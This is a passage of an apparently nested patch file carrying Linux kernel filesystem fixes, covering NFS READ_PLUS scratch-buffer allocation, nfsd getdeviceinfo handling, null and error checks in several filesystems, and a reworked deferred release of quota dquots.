++
++	fc = alloc_fs_context(type, reference, 0, 0, FS_CONTEXT_FOR_SUBMOUNT);
++	if (IS_ERR(fc))
++		return fc;
++
++	ret = security_fs_context_submount(fc, reference->d_sb);
++	if (ret) {
++		put_fs_context(fc);
++		return ERR_PTR(ret);
++	}
++
++	return fc;
+ }
+ EXPORT_SYMBOL(fs_context_for_submount);
+ 
+diff --git a/fs/iomap/buffered-io.c b/fs/iomap/buffered-io.c
+index 91ee0b308e13d..a0a4d8de82cad 100644
+--- a/fs/iomap/buffered-io.c
++++ b/fs/iomap/buffered-io.c
+@@ -488,11 +488,6 @@ void iomap_invalidate_folio(struct folio *folio, size_t offset, size_t len)
+ 		WARN_ON_ONCE(folio_test_writeback(folio));
+ 		folio_cancel_dirty(folio);
+ 		iomap_page_release(folio);
+-	} else if (folio_test_large(folio)) {
+-		/* Must release the iop so the page can be split */
+-		WARN_ON_ONCE(!folio_test_uptodate(folio) &&
+-			     folio_test_dirty(folio));
+-		iomap_page_release(folio);
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(iomap_invalidate_folio);
+diff --git a/fs/jfs/jfs_extent.c b/fs/jfs/jfs_extent.c
+index ae99a7e232eeb..a82751e6c47f9 100644
+--- a/fs/jfs/jfs_extent.c
++++ b/fs/jfs/jfs_extent.c
+@@ -311,6 +311,11 @@ extBalloc(struct inode *ip, s64 hint, s64 * nblocks, s64 * blkno)
+ 	 * blocks in the map. in that case, we'll start off with the
+ 	 * maximum free.
+ 	 */
++
++	/* give up if no space left */
++	if (bmp->db_maxfreebud == -1)
++		return -ENOSPC;
++
+ 	max = (s64) 1 << bmp->db_maxfreebud;
+ 	if (*nblocks >= max && *nblocks > nbperpage)
+ 		nb = nblks = (max > nbperpage) ? max : nbperpage;
+diff --git a/fs/lockd/mon.c b/fs/lockd/mon.c
+index 1d9488cf05348..87a0f207df0b9 100644
+--- a/fs/lockd/mon.c
++++ b/fs/lockd/mon.c
+@@ -276,6 +276,9 @@ static struct nsm_handle *nsm_create_handle(const struct sockaddr *sap,
+ {
+ 	struct nsm_handle *new;
+ 
++	if (!hostname)
++		return NULL;
++
+ 	new = kzalloc(sizeof(*new) + hostname_len + 1, GFP_KERNEL);
+ 	if (unlikely(new == NULL))
+ 		return NULL;
+diff --git a/fs/namei.c b/fs/namei.c
+index 5b3865ad9d052..4248647f1ab24 100644
+--- a/fs/namei.c
++++ b/fs/namei.c
+@@ -2859,7 +2859,7 @@ int path_pts(struct path *path)
+ 	dput(path->dentry);
+ 	path->dentry = parent;
+ 	child = d_hash_and_lookup(parent, &this);
+-	if (!child)
++	if (IS_ERR_OR_NULL(child))
+ 		return -ENOENT;
+ 
+ 	path->dentry = child;
+diff --git a/fs/nfs/blocklayout/dev.c b/fs/nfs/blocklayout/dev.c
+index fea5f8821da5e..ce2ea62397972 100644
+--- a/fs/nfs/blocklayout/dev.c
++++ b/fs/nfs/blocklayout/dev.c
+@@ -402,7 +402,7 @@ bl_parse_concat(struct nfs_server *server, struct pnfs_block_dev *d,
+ 	int ret, i;
+ 
+ 	d->children = kcalloc(v->concat.volumes_count,
+-			sizeof(struct pnfs_block_dev), GFP_KERNEL);
++			sizeof(struct pnfs_block_dev), gfp_mask);
+ 	if (!d->children)
+ 		return -ENOMEM;
+ 
+@@ -431,7 +431,7 @@ bl_parse_stripe(struct nfs_server *server, struct pnfs_block_dev *d,
+ 	int ret, i;
+ 
+ 	d->children = kcalloc(v->stripe.volumes_count,
+-			sizeof(struct pnfs_block_dev), GFP_KERNEL);
++			sizeof(struct pnfs_block_dev), gfp_mask);
+ 	if (!d->children)
+ 		return -ENOMEM;
+ 
+diff --git a/fs/nfs/internal.h b/fs/nfs/internal.h
+index ae7d4a8c728c2..4b07a0508f9d8 100644
+--- a/fs/nfs/internal.h
++++ b/fs/nfs/internal.h
+@@ -484,6 +484,7 @@ struct nfs_pgio_completion_ops;
+ extern void nfs_pageio_init_read(struct nfs_pageio_descriptor *pgio,
+ 			struct inode *inode, bool force_mds,
+ 			const struct nfs_pgio_completion_ops *compl_ops);
++extern bool nfs_read_alloc_scratch(struct nfs_pgio_header *hdr, size_t size);
+ extern void nfs_read_prepare(struct rpc_task *task, void *calldata);
+ extern void nfs_pageio_reset_read_mds(struct nfs_pageio_descriptor *pgio);
+ 
+diff --git a/fs/nfs/nfs2xdr.c b/fs/nfs/nfs2xdr.c
+index 05c3b4b2b3dd8..c190938142960 100644
+--- a/fs/nfs/nfs2xdr.c
++++ b/fs/nfs/nfs2xdr.c
+@@ -949,7 +949,7 @@ int nfs2_decode_dirent(struct xdr_stream *xdr, struct nfs_entry *entry,
+ 
+ 	error = decode_filename_inline(xdr, &entry->name, &entry->len);
+ 	if (unlikely(error))
+-		return -EAGAIN;
++		return error == -ENAMETOOLONG ? -ENAMETOOLONG : -EAGAIN;
+ 
+ 	/*
+ 	 * The type (size and byte order) of nfscookie isn't defined in
+diff --git a/fs/nfs/nfs3xdr.c b/fs/nfs/nfs3xdr.c
+index 3b0b650c9c5ab..60f032be805ae 100644
+--- a/fs/nfs/nfs3xdr.c
++++ b/fs/nfs/nfs3xdr.c
+@@ -1991,7 +1991,7 @@ int nfs3_decode_dirent(struct xdr_stream *xdr, struct nfs_entry *entry,
+ 
+ 	error = decode_inline_filename3(xdr, &entry->name, &entry->len);
+ 	if (unlikely(error))
+-		return -EAGAIN;
++		return error == -ENAMETOOLONG ? -ENAMETOOLONG : -EAGAIN;
+ 
+ 	error = decode_cookie3(xdr, &new_cookie);
+ 	if (unlikely(error))
+diff --git a/fs/nfs/nfs42.h b/fs/nfs/nfs42.h
+index 0fe5aacbcfdf1..b59876b01a1e3 100644
+--- a/fs/nfs/nfs42.h
++++ b/fs/nfs/nfs42.h
+@@ -13,6 +13,7 @@
+  * more? Need to consider not to pre-alloc too much for a compound.
+  */
+ #define PNFS_LAYOUTSTATS_MAXDEV (4)
++#define READ_PLUS_SCRATCH_SIZE (16)
+ 
+ /* nfs4.2proc.c */
+ #ifdef CONFIG_NFS_V4_2
+diff --git a/fs/nfs/nfs42proc.c b/fs/nfs/nfs42proc.c
+index 7c33bba179d2f..d903ea10410c2 100644
+--- a/fs/nfs/nfs42proc.c
++++ b/fs/nfs/nfs42proc.c
+@@ -470,8 +470,9 @@ ssize_t nfs42_proc_copy(struct file *src, loff_t pos_src,
+ 				continue;
+ 			}
+ 			break;
+-		} else if (err == -NFS4ERR_OFFLOAD_NO_REQS && !args.sync) {
+-			args.sync = true;
++		} else if (err == -NFS4ERR_OFFLOAD_NO_REQS &&
++				args.sync != res.synchronous) {
++			args.sync = res.synchronous;
+ 			dst_exception.retry = 1;
+ 			continue;
+ 		} else if ((err == -ESTALE ||
+diff --git a/fs/nfs/nfs42xdr.c b/fs/nfs/nfs42xdr.c
+index 2fd465cab631d..20aa5e746497d 100644
+--- a/fs/nfs/nfs42xdr.c
++++ b/fs/nfs/nfs42xdr.c
+@@ -47,13 +47,20 @@
+ #define decode_deallocate_maxsz		(op_decode_hdr_maxsz)
+ #define encode_read_plus_maxsz		(op_encode_hdr_maxsz + \
+ 					 encode_stateid_maxsz + 3)
+-#define NFS42_READ_PLUS_SEGMENT_SIZE	(1 /* data_content4 */ + \
++#define NFS42_READ_PLUS_DATA_SEGMENT_SIZE \
++					(1 /* data_content4 */ + \
++					 2 /* data_info4.di_offset */ + \
++					 1 /* data_info4.di_length */)
++#define NFS42_READ_PLUS_HOLE_SEGMENT_SIZE \
++					(1 /* data_content4 */ + \
+ 					 2 /* data_info4.di_offset */ + \
+ 					 2 /* data_info4.di_length */)
++#define READ_PLUS_SEGMENT_SIZE_DIFF	(NFS42_READ_PLUS_HOLE_SEGMENT_SIZE - \
++					 NFS42_READ_PLUS_DATA_SEGMENT_SIZE)
+ #define decode_read_plus_maxsz		(op_decode_hdr_maxsz + \
+ 					 1 /* rpr_eof */ + \
+ 					 1 /* rpr_contents count */ + \
+-					 2 * NFS42_READ_PLUS_SEGMENT_SIZE)
++					 NFS42_READ_PLUS_HOLE_SEGMENT_SIZE)
+ #define encode_seek_maxsz		(op_encode_hdr_maxsz + \
+ 					 encode_stateid_maxsz + \
+ 					 2 /* offset */ + \
+@@ -780,8 +787,8 @@ static void nfs4_xdr_enc_read_plus(struct rpc_rqst *req,
+ 	encode_putfh(xdr, args->fh, &hdr);
+ 	encode_read_plus(xdr, args, &hdr);
+ 
+-	rpc_prepare_reply_pages(req, args->pages, args->pgbase,
+-				args->count, hdr.replen);
++	rpc_prepare_reply_pages(req, args->pages, args->pgbase, args->count,
++				hdr.replen - READ_PLUS_SEGMENT_SIZE_DIFF);
+ 	encode_nops(&hdr);
+ }
+ 
+@@ -1121,7 +1128,6 @@ static int decode_read_plus(struct xdr_stream *xdr, struct nfs_pgio_res *res)
+ 	uint32_t segments;
+ 	struct read_plus_segment *segs;
+ 	int status, i;
+-	char scratch_buf[16];
+ 	__be32 *p;
+ 
+ 	status = decode_op_hdr(xdr, OP_READ_PLUS);
+@@ -1136,14 +1142,12 @@ static int decode_read_plus(struct xdr_stream *xdr, struct nfs_pgio_res *res)
+ 	res->eof = be32_to_cpup(p++);
+ 	segments = be32_to_cpup(p++);
+ 	if (segments == 0)
+-		return status;
++		return 0;
+ 
+ 	segs = kmalloc_array(segments, sizeof(*segs), GFP_KERNEL);
+ 	if (!segs)
+ 		return -ENOMEM;
+ 
+-	xdr_set_scratch_buffer(xdr, &scratch_buf, sizeof(scratch_buf));
+-	status = -EIO;
+ 	for (i = 0; i < segments; i++) {
+ 		status = decode_read_plus_segment(xdr, &segs[i]);
+ 		if (status < 0)
+@@ -1347,6 +1351,8 @@ static int nfs4_xdr_dec_read_plus(struct rpc_rqst *rqstp,
+ 	struct compound_hdr hdr;
+ 	int status;
+ 
++	xdr_set_scratch_buffer(xdr, res->scratch, READ_PLUS_SCRATCH_SIZE);
++
+ 	status = decode_compound_hdr(xdr, &hdr);
+ 	if (status)
+ 		goto out;
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 1044305e77996..2dec0fed1ba16 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -5459,17 +5459,21 @@ static int nfs4_read_done(struct rpc_task *task, struct nfs_pgio_header *hdr)
+ }
+ 
+ #if defined CONFIG_NFS_V4_2 && defined CONFIG_NFS_V4_2_READ_PLUS
+-static void nfs42_read_plus_support(struct nfs_pgio_header *hdr,
++static bool nfs42_read_plus_support(struct nfs_pgio_header *hdr,
+ 				    struct rpc_message *msg)
+ {
+ 	/* Note: We don't use READ_PLUS with pNFS yet */
+-	if (nfs_server_capable(hdr->inode, NFS_CAP_READ_PLUS) && !hdr->ds_clp)
++	if (nfs_server_capable(hdr->inode, NFS_CAP_READ_PLUS) && !hdr->ds_clp) {
+ 		msg->rpc_proc = &nfs4_procedures[NFSPROC4_CLNT_READ_PLUS];
++		return nfs_read_alloc_scratch(hdr, READ_PLUS_SCRATCH_SIZE);
++	}
++	return false;
+ }
+ #else
+-static void nfs42_read_plus_support(struct nfs_pgio_header *hdr,
++static bool nfs42_read_plus_support(struct nfs_pgio_header *hdr,
+ 				    struct rpc_message *msg)
+ {
++	return false;
+ }
+ #endif /* CONFIG_NFS_V4_2 */
+ 
+@@ -5479,8 +5483,8 @@ static void nfs4_proc_read_setup(struct nfs_pgio_header *hdr,
+ 	hdr->timestamp   = jiffies;
+ 	if (!hdr->pgio_done_cb)
+ 		hdr->pgio_done_cb = nfs4_read_done_cb;
+-	msg->rpc_proc = &nfs4_procedures[NFSPROC4_CLNT_READ];
+-	nfs42_read_plus_support(hdr, msg);
++	if (!nfs42_read_plus_support(hdr, msg))
++		msg->rpc_proc = &nfs4_procedures[NFSPROC4_CLNT_READ];
+ 	nfs4_init_sequence(&hdr->args.seq_args, &hdr->res.seq_res, 0, 0);
+ }
+ 
+diff --git a/fs/nfs/pnfs_nfs.c b/fs/nfs/pnfs_nfs.c
+index 5d035dd2d7bf0..47a8da3f5c9ff 100644
+--- a/fs/nfs/pnfs_nfs.c
++++ b/fs/nfs/pnfs_nfs.c
+@@ -943,7 +943,7 @@ static int _nfs4_pnfs_v4_ds_connect(struct nfs_server *mds_srv,
+ 			* Test this address for session trunking and
+ 			* add as an alias
+ 			*/
+-			xprtdata.cred = nfs4_get_clid_cred(clp),
++			xprtdata.cred = nfs4_get_clid_cred(clp);
+ 			rpc_clnt_add_xprt(clp->cl_rpcclient, &xprt_args,
+ 					  rpc_clnt_setup_test_and_add_xprt,
+ 					  &rpcdata);
+diff --git a/fs/nfs/read.c b/fs/nfs/read.c
+index cd970ce62786b..6aad42fbf797a 100644
+--- a/fs/nfs/read.c
++++ b/fs/nfs/read.c
+@@ -47,6 +47,8 @@ static struct nfs_pgio_header *nfs_readhdr_alloc(void)
+ 
+ static void nfs_readhdr_free(struct nfs_pgio_header *rhdr)
+ {
++	if (rhdr->res.scratch != NULL)
++		kfree(rhdr->res.scratch);
+ 	kmem_cache_free(nfs_rdata_cachep, rhdr);
+ }
+ 
+@@ -109,6 +111,14 @@ void nfs_pageio_reset_read_mds(struct nfs_pageio_descriptor *pgio)
+ }
+ EXPORT_SYMBOL_GPL(nfs_pageio_reset_read_mds);
+ 
++bool nfs_read_alloc_scratch(struct nfs_pgio_header *hdr, size_t size)
++{
++	WARN_ON(hdr->res.scratch != NULL);
++	hdr->res.scratch = kmalloc(size, GFP_KERNEL);
++	return hdr->res.scratch != NULL;
++}
++EXPORT_SYMBOL_GPL(nfs_read_alloc_scratch);
++
+ static void nfs_readpage_release(struct nfs_page *req, int error)
+ {
+ 	struct inode *inode = d_inode(nfs_req_openctx(req)->dentry);
+diff --git a/fs/nfsd/blocklayoutxdr.c b/fs/nfsd/blocklayoutxdr.c
+index 442543304930b..2455dc8be18a8 100644
+--- a/fs/nfsd/blocklayoutxdr.c
++++ b/fs/nfsd/blocklayoutxdr.c
+@@ -82,6 +82,15 @@ nfsd4_block_encode_getdeviceinfo(struct xdr_stream *xdr,
+ 	int len = sizeof(__be32), ret, i;
+ 	__be32 *p;
+ 
++	/*
++	 * See paragraph 5 of RFC 8881 S18.40.3.
++	 */
++	if (!gdp->gd_maxcount) {
++		if (xdr_stream_encode_u32(xdr, 0) != XDR_UNIT)
++			return nfserr_resource;
++		return nfs_ok;
++	}
++
+ 	p = xdr_reserve_space(xdr, len + sizeof(__be32));
+ 	if (!p)
+ 		return nfserr_resource;
+diff --git a/fs/nfsd/flexfilelayoutxdr.c b/fs/nfsd/flexfilelayoutxdr.c
+index e81d2a5cf381e..bb205328e043d 100644
+--- a/fs/nfsd/flexfilelayoutxdr.c
++++ b/fs/nfsd/flexfilelayoutxdr.c
+@@ -85,6 +85,15 @@ nfsd4_ff_encode_getdeviceinfo(struct xdr_stream *xdr,
+ 	int addr_len;
+ 	__be32 *p;
+ 
++	/*
++	 * See paragraph 5 of RFC 8881 S18.40.3.
++	 */
++	if (!gdp->gd_maxcount) {
++		if (xdr_stream_encode_u32(xdr, 0) != XDR_UNIT)
++			return nfserr_resource;
++		return nfs_ok;
++	}
++
+ 	/* len + padding for two strings */
+ 	addr_len = 16 + da->netaddr.netid_len + da->netaddr.addr_len;
+ 	ver_len = 20;
+diff --git a/fs/nfsd/nfs4xdr.c b/fs/nfsd/nfs4xdr.c
+index 8f90a87ee9ca0..89a579be042e5 100644
+--- a/fs/nfsd/nfs4xdr.c
++++ b/fs/nfsd/nfs4xdr.c
+@@ -4571,20 +4571,17 @@ nfsd4_encode_getdeviceinfo(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ 	*p++ = cpu_to_be32(gdev->gd_layout_type);
+ 
+-	/* If maxcount is 0 then just update notifications */
+-	if (gdev->gd_maxcount != 0) {
+-		ops = nfsd4_layout_ops[gdev->gd_layout_type];
+-		nfserr = ops->encode_getdeviceinfo(xdr, gdev);
+-		if (nfserr) {
+-			/*
+-			 * We don't bother to burden the layout drivers with
+-			 * enforcing gd_maxcount, just tell the client to
+-			 * come back with a bigger buffer if it's not enough.
+-			 */
+-			if (xdr->buf->len + 4 > gdev->gd_maxcount)
+-				goto toosmall;
+-			return nfserr;
+-		}
++	ops = nfsd4_layout_ops[gdev->gd_layout_type];
++	nfserr = ops->encode_getdeviceinfo(xdr, gdev);
++	if (nfserr) {
++		/*
++		 * We don't bother to burden the layout drivers with
++		 * enforcing gd_maxcount, just tell the client to
++		 * come back with a bigger buffer if it's not enough.
++		 */
++		if (xdr->buf->len + 4 > gdev->gd_maxcount)
++			goto toosmall;
++		return nfserr;
+ 	}
+ 
+ 	if (gdev->gd_notify_types) {
+diff --git a/fs/nls/nls_base.c b/fs/nls/nls_base.c
+index 52ccd34b1e792..a026dbd3593f6 100644
+--- a/fs/nls/nls_base.c
++++ b/fs/nls/nls_base.c
+@@ -272,7 +272,7 @@ int unregister_nls(struct nls_table * nls)
+ 	return -EINVAL;
+ }
+ 
+-static struct nls_table *find_nls(char *charset)
++static struct nls_table *find_nls(const char *charset)
+ {
+ 	struct nls_table *nls;
+ 	spin_lock(&nls_lock);
+@@ -288,7 +288,7 @@ static struct nls_table *find_nls(char *charset)
+ 	return nls;
+ }
+ 
+-struct nls_table *load_nls(char *charset)
++struct nls_table *load_nls(const char *charset)
+ {
+ 	return try_then_request_module(find_nls(charset), "nls_%s", charset);
+ }
+diff --git a/fs/ocfs2/namei.c b/fs/ocfs2/namei.c
+index 1c7ac433667df..04a8505bd97af 100644
+--- a/fs/ocfs2/namei.c
++++ b/fs/ocfs2/namei.c
+@@ -1535,6 +1535,10 @@ static int ocfs2_rename(struct user_namespace *mnt_userns,
+ 		status = ocfs2_add_entry(handle, new_dentry, old_inode,
+ 					 OCFS2_I(old_inode)->ip_blkno,
+ 					 new_dir_bh, &target_insert);
++		if (status < 0) {
++			mlog_errno(status);
++			goto bail;
++		}
+ 	}
+ 
+ 	old_inode->i_ctime = current_time(old_inode);
+diff --git a/fs/overlayfs/super.c b/fs/overlayfs/super.c
+index 51eec4a8e82b2..08d3a1f34ac6c 100644
+--- a/fs/overlayfs/super.c
++++ b/fs/overlayfs/super.c
+@@ -2155,7 +2155,7 @@ static int ovl_fill_super(struct super_block *sb, void *data, int silent)
+ 		ovl_trusted_xattr_handlers;
+ 	sb->s_fs_info = ofs;
+ 	sb->s_flags |= SB_POSIXACL;
+-	sb->s_iflags |= SB_I_SKIP_SYNC;
++	sb->s_iflags |= SB_I_SKIP_SYNC | SB_I_IMA_UNVERIFIABLE_SIGNATURE;
+ 
+ 	err = -ENOMEM;
+ 	root_dentry = ovl_get_root(sb, upperpath.dentry, oe);
+diff --git a/fs/proc/base.c b/fs/proc/base.c
+index 9e479d7d202b1..74442e01793f3 100644
+--- a/fs/proc/base.c
++++ b/fs/proc/base.c
+@@ -3581,7 +3581,8 @@ static int proc_tid_comm_permission(struct user_namespace *mnt_userns,
+ }
+ 
+ static const struct inode_operations proc_tid_comm_inode_operations = {
+-		.permission = proc_tid_comm_permission,
++		.setattr	= proc_setattr,
++		.permission	= proc_tid_comm_permission,
+ };
+ 
+ /*
+diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c
+index 2384de1c2d187..1e755d093d921 100644
+--- a/fs/pstore/ram_core.c
++++ b/fs/pstore/ram_core.c
+@@ -518,7 +518,7 @@ static int persistent_ram_post_init(struct persistent_ram_zone *prz, u32 sig,
+ 	sig ^= PERSISTENT_RAM_SIG;
+ 
+ 	if (prz->buffer->sig == sig) {
+-		if (buffer_size(prz) == 0) {
++		if (buffer_size(prz) == 0 && buffer_start(prz) == 0) {
+ 			pr_debug("found existing empty buffer\n");
+ 			return 0;
+ 		}
+diff --git a/fs/quota/dquot.c b/fs/quota/dquot.c
+index 46dca88d89c36..53b65c5300fde 100644
+--- a/fs/quota/dquot.c
++++ b/fs/quota/dquot.c
+@@ -225,13 +225,22 @@ static void put_quota_format(struct quota_format_type *fmt)
+ 
+ /*
+  * Dquot List Management:
+- * The quota code uses four lists for dquot management: the inuse_list,
+- * free_dquots, dqi_dirty_list, and dquot_hash[] array. A single dquot
+- * structure may be on some of those lists, depending on its current state.
++ * The quota code uses five lists for dquot management: the inuse_list,
++ * releasing_dquots, free_dquots, dqi_dirty_list, and dquot_hash[] array.
++ * A single dquot structure may be on some of those lists, depending on
++ * its current state.
+  *
+  * All dquots are placed to the end of inuse_list when first created, and this
+  * list is used for invalidate operation, which must look at every dquot.
+  *
++ * When the last reference of a dquot will be dropped, the dquot will be
++ * added to releasing_dquots. We'd then queue work item which would call
++ * synchronize_srcu() and after that perform the final cleanup of all the
++ * dquots on the list. Both releasing_dquots and free_dquots use the
++ * dq_free list_head in the dquot struct. When a dquot is removed from
++ * releasing_dquots, a reference count is always subtracted, and if
++ * dq_count == 0 at that point, the dquot will be added to the free_dquots.
++ *
+  * Unused dquots (dq_count == 0) are added to the free_dquots list when freed,
+  * and this list is searched whenever we need an available dquot.  Dquots are
+  * removed from the list as soon as they are used again, and
+@@ -250,6 +259,7 @@ static void put_quota_format(struct quota_format_type *fmt)
+ 
+ static LIST_HEAD(inuse_list);
+ static LIST_HEAD(free_dquots);
++static LIST_HEAD(releasing_dquots);
+ static unsigned int dq_hash_bits, dq_hash_mask;
+ static struct hlist_head *dquot_hash;
+ 
+@@ -260,6 +270,9 @@ static qsize_t inode_get_rsv_space(struct inode *inode);
+ static qsize_t __inode_get_rsv_space(struct inode *inode);
+ static int __dquot_initialize(struct inode *inode, int type);
+ 
++static void quota_release_workfn(struct work_struct *work);
++static DECLARE_DELAYED_WORK(quota_release_work, quota_release_workfn);
++
+ static inline unsigned int
+ hashfn(const struct super_block *sb, struct kqid qid)
+ {
+@@ -305,12 +318,18 @@ static inline void put_dquot_last(struct dquot *dquot)
+ 	dqstats_inc(DQST_FREE_DQUOTS);
+ }
+ 
++static inline void put_releasing_dquots(struct dquot *dquot)
++{
++	list_add_tail(&dquot->dq_free, &releasing_dquots);
++}
++
+ static inline void remove_free_dquot(struct dquot *dquot)
+ {
+ 	if (list_empty(&dquot->dq_free))
+ 		return;
+ 	list_del_init(&dquot->dq_free);
+-	dqstats_dec(DQST_FREE_DQUOTS);
++	if (!atomic_read(&dquot->dq_count))
++		dqstats_dec(DQST_FREE_DQUOTS);
+ }
+ 
+ static inline void put_inuse(struct dquot *dquot)
+@@ -336,6 +355,11 @@ static void wait_on_dquot(struct dquot *dquot)
+ 	mutex_unlock(&dquot->dq_lock);
+ }
+ 
++static inline int dquot_active(struct dquot *dquot)
++{
++	return test_bit(DQ_ACTIVE_B, &dquot->dq_flags);
++}
++
+ static inline int dquot_dirty(struct dquot *dquot)
+ {
+ 	return test_bit(DQ_MOD_B, &dquot->dq_flags);
+@@ -351,14 +375,14 @@ int dquot_mark_dquot_dirty(struct dquot *dquot)
+ {
+ 	int ret = 1;
+ 
+-	if (!test_bit(DQ_ACTIVE_B, &dquot->dq_flags))
++	if (!dquot_active(dquot))
+ 		return 0;
+ 
+ 	if (sb_dqopt(dquot->dq_sb)->flags & DQUOT_NOLIST_DIRTY)
+ 		return test_and_set_bit(DQ_MOD_B, &dquot->dq_flags);
+ 
+ 	/* If quota is dirty already, we don't have to acquire dq_list_lock */
+-	if (test_bit(DQ_MOD_B, &dquot->dq_flags))
++	if (dquot_dirty(dquot))
+ 		return 1;
+ 
+ 	spin_lock(&dq_list_lock);
+@@ -440,7 +464,7 @@ int dquot_acquire(struct dquot *dquot)
+ 	smp_mb__before_atomic();
+ 	set_bit(DQ_READ_B, &dquot->dq_flags);
+ 	/* Instantiate dquot if needed */
+-	if (!test_bit(DQ_ACTIVE_B, &dquot->dq_flags) && !dquot->dq_off) {
++	if (!dquot_active(dquot) && !dquot->dq_off) {
+ 		ret = dqopt->ops[dquot->dq_id.type]->commit_dqblk(dquot);
+ 		/* Write the info if needed */
+ 		if (info_dirty(&dqopt->info[dquot->dq_id.type])) {
+@@ -482,7 +506,7 @@ int dquot_commit(struct dquot *dquot)
+ 		goto out_lock;
+ 	/* Inactive dquot can be only if there was error during read/init
+ 	 * => we have better not writing it */
+-	if (test_bit(DQ_ACTIVE_B, &dquot->dq_flags))
++	if (dquot_active(dquot))
+ 		ret = dqopt->ops[dquot->dq_id.type]->commit_dqblk(dquot);
+ 	else
+ 		ret = -EIO;
+@@ -547,6 +571,8 @@ static void invalidate_dquots(struct super_block *sb, int type)
+ 	struct dquot *dquot, *tmp;
+ 
+ restart:
++	flush_delayed_work(&quota_release_work);
++
+ 	spin_lock(&dq_list_lock);
+ 	list_for_each_entry_safe(dquot, tmp, &inuse_list, dq_inuse) {
+ 		if (dquot->dq_sb != sb)
+@@ -555,6 +581,12 @@ restart:
+ 			continue;
+ 		/* Wait for dquot users */
+ 		if (atomic_read(&dquot->dq_count)) {
++			/* dquot in releasing_dquots, flush and retry */
++			if (!list_empty(&dquot->dq_free)) {
++				spin_unlock(&dq_list_lock);
++				goto restart;
++			}
++
+ 			atomic_inc(&dquot->dq_count);
+ 			spin_unlock(&dq_list_lock);
+ 			/*
+@@ -597,7 +629,7 @@ int dquot_scan_active(struct super_block *sb,
+ 
+ 	spin_lock(&dq_list_lock);
+ 	list_for_each_entry(dquot, &inuse_list, dq_inuse) {
+-		if (!test_bit(DQ_ACTIVE_B, &dquot->dq_flags))
++		if (!dquot_active(dquot))
+ 			continue;
+ 		if (dquot->dq_sb != sb)
+ 			continue;
+@@ -612,7 +644,7 @@ int dquot_scan_active(struct super_block *sb,
+ 		 * outstanding call and recheck the DQ_ACTIVE_B after that.
+ 		 */
+ 		wait_on_dquot(dquot);
+-		if (test_bit(DQ_ACTIVE_B, &dquot->dq_flags)) {
++		if (dquot_active(dquot)) {
+ 			ret = fn(dquot, priv);
+ 			if (ret < 0)
+ 				goto out;
+@@ -628,6 +660,18 @@ out:
+ }
+ EXPORT_SYMBOL(dquot_scan_active);
+ 
++static inline int dquot_write_dquot(struct dquot *dquot)
++{
++	int ret = dquot->dq_sb->dq_op->write_dquot(dquot);
++	if (ret < 0) {
++		quota_error(dquot->dq_sb, "Can't write quota structure "
++			    "(error %d). Quota may get out of sync!", ret);
++		/* Clear dirty bit anyway to avoid infinite loop. */
++		clear_dquot_dirty(dquot);
++	}
++	return ret;
++}
++
+ /* Write all dquot structures to quota files */
+ int dquot_writeback_dquots(struct super_block *sb, int type)
+ {
+@@ -651,23 +695,16 @@ int dquot_writeback_dquots(struct super_block *sb, int type)
+ 			dquot = list_first_entry(&dirty, struct dquot,
+ 						 dq_dirty);
+ 
+-			WARN_ON(!test_bit(DQ_ACTIVE_B, &dquot->dq_flags));
++			WARN_ON(!dquot_active(dquot));
+ 
+ 			/* Now we have active dquot from which someone is
+  			 * holding reference so we can safely just increase
+ 			 * use count */
+ 			dqgrab(dquot);
+ 			spin_unlock(&dq_list_lock);
+-			err = sb->dq_op->write_dquot(dquot);
+-			if (err) {
+-				/*
+-				 * Clear dirty bit anyway to avoid infinite
+-				 * loop here.
+-				 */
+-				clear_dquot_dirty(dquot);
+-				if (!ret)
+-					ret = err;
+-			}
++			err = dquot_write_dquot(dquot);
++			if (err && !ret)
++				ret = err;
+ 			dqput(dquot);
+ 			spin_lock(&dq_list_lock);
+ 		}
+@@ -760,13 +797,54 @@ static struct shrinker dqcache_shrinker = {
+ 	.seeks = DEFAULT_SEEKS,
+ };
+ 
++/*
++ * Safely release dquot and put reference to dquot.
++ */
++static void quota_release_workfn(struct work_struct *work)
++{
++	struct dquot *dquot;
++	struct list_head rls_head;
++
++	spin_lock(&dq_list_lock);
++	/* Exchange the list head to avoid livelock. */
++	list_replace_init(&releasing_dquots, &rls_head);
++	spin_unlock(&dq_list_lock);
++
++restart:
++	synchronize_srcu(&dquot_srcu);
++	spin_lock(&dq_list_lock);
++	while (!list_empty(&rls_head)) {
++		dquot = list_first_entry(&rls_head, struct dquot, dq_free);
++		/* Dquot got used again? */
++		if (atomic_read(&dquot->dq_count) > 1) {
++			remove_free_dquot(dquot);
++			atomic_dec(&dquot->dq_count);
++			continue;
++		}
++		if (dquot_dirty(dquot)) {
++			spin_unlock(&dq_list_lock);
++			/* Commit dquot before releasing */
++			dquot_write_dquot(dquot);
++			goto restart;
++		}
++		if (dquot_active(dquot)) {
++			spin_unlock(&dq_list_lock);
++			dquot->dq_sb->dq_op->release_dquot(dquot);
++			goto restart;
++		}
++		/* Dquot is inactive and clean, now move it to free list */
++		remove_free_dquot(dquot);
++		atomic_dec(&dquot->dq_count);
++		put_dquot_last(dquot);
++	}
++	spin_unlock(&dq_list_lock);
++}
++
+ /*
+  * Put reference to dquot
+  */
+ void dqput(struct dquot *dquot)
+ {
+-	int ret;
+-
+ 	if (!dquot)
+ 		return;
+ #ifdef CONFIG_QUOTA_DEBUG
+@@ -778,7 +856,7 @@ void dqput(struct dquot *dquot)
+ 	}
+ #endif
+ 	dqstats_inc(DQST_DROPS);
+-we_slept:
++
+ 	spin_lock(&dq_list_lock);
+ 	if (atomic_read(&dquot->dq_count) > 1) {
+ 		/* We have more than one user... nothing to do */
+@@ -790,35 +868,15 @@ we_slept:
+ 		spin_unlock(&dq_list_lock);
+ 		return;
+ 	}
++
+ 	/* Need to release dquot? */
+-	if (dquot_dirty(dquot)) {
+-		spin_unlock(&dq_list_lock);
+-		/* Commit dquot before releasing */
+-		ret = dquot->dq_sb->dq_op->write_dquot(dquot);
+-		if (ret < 0) {
+-			quota_error(dquot->dq_sb, "Can't write quota structure"
+-				    " (error %d). Quota may get out of sync!",
+-				    ret);
+-			/*
+-			 * We clear dirty bit anyway, so that we avoid
+-			 * infinite loop here
+-			 */
+-			clear_dquot_dirty(dquot);
+-		}
+-		goto we_slept;
+-	}
+-	if (test_bit(DQ_ACTIVE_B, &dquot->dq_flags)) {
